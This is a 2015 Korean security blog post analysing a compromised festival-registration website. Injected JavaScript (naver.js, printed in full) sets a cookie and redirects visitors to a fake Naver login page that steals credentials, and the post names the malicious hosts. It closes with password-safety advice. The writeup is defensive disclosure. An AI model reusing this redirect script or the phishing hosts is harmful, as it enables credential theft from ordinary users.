모의해킹 (WAPT)

네이버 로그인 정보 탈취 피싱사이트

날으는물고기 2015. 8. 20. 18:43

여름 끝자락, 가족물총축제로 시원하게!

http://mediahub.seoul.go.kr/archives/903363


위 사이트에 게재된 뉴스 기사를 통해 아래 내용을 접하고


기사내용 일부:

참가 접수는 물총축제 홈페이지(water.ibabynews.com)에서 진행하며, 신청한 가족 중 추첨을 통해 500가족을 선발합니다.


해당 내용에 따라 참가 접수를 위해 홈페이지 방문을 했는데 아래와 같이 네이버 로그인 창이 떳다.



이는 그냥 봐도 의심 안할 수가 없는 상황이다. ㅋ

네이버 로그인을 붙일 수는 없을것 같은데 설마해서 아이디/비밀번호를 엉터리로 입력해서 로그인 해봤다.

결국 에러창이 떳고 세부내용 확인 결과 네이버 로그인 정보 탈취하는 피싱사이트 감염된 상태였다.



문제가 되는 naver.js 파일이 로딩되고 있었다.


http://www.kwanginsa.com/cd/naver.js

if(document.cookie.indexOf("do_naver=")==-1)

{


var expires=new Date();

expires.setTime(expires.getTime()+24*60*60*1000);

document.cookie="do_naver=Yes;path=/;expires="+expires.toGMTString();

var ref = document.referrer;

location.href="http://www.koreaconst.co.kr/file_upload/login.php";


}


이는 네이버 로그인 정보 탈취 피싱사이트로 이동시키고 있었다.


http://www.koreaconst.co.kr/file_upload/login.php


네이버 아이디 비밀번호를 입력하면 해커에게 고스란히 전달될 것이다.



피싱사이트 URL로 네이버 툴바가 설치된 상태에서 접속을 해보면 차단을 해준다.

하지만, 위 사이트처럼 프레임 내부에서 이동될 경우에는 안타깝게도 차단되지 않는다.


http://www.koreaconst.co.kr/file_upload/login.php


해당 피싱사이트에 접속해보면 아래와 같이 네이버와 유사한 로그인 창이 나타나게 되고

일반적인 사용자는 의심없이 네이버 아이디와 비밀번호를 입력할 것이다.



본인이 직접 네이버 사이트로 접속을 한 경우가 아니라면

네이버 아이디와 비밀번호를 요구할 경우 반드시 의심을 해보고

의심스럽다 생각될 경우 아이디와 비밀번호를 엉터리로 입력해서

정상적으로 네이버 로그인 에러 화면이 나오는지 반드시 확인되어야 할 것이다.


그리고 사이트 비밀번호는 반드시 사이트 마다 서로다른 비밀번호를 사용해야 하며

비밀번호는 주기적으로 변경을 통해 꾸준한 관리가 반드시 필요하다.

비밀번호 변경시에는 이전 사용한 비밀번호 사용을 재사용 하지 않아야 한다.

728x90